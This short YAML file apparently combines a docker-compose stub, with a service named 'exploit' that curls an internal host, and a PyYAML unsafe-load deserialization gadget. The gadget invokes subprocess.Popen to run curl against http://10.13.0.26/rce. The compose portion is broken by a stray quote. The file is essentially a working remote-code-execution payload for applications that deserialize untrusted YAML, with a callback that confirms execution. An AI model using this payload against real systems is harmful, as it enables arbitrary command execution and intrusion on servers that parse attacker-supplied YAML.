version: "3.3"

services:
  exploit:
    build: https://github.com/joeferner/redis-commander.git
    restart: always
    command: curl http://10.13.0.26:8000/test"
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://10.13.0.26/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load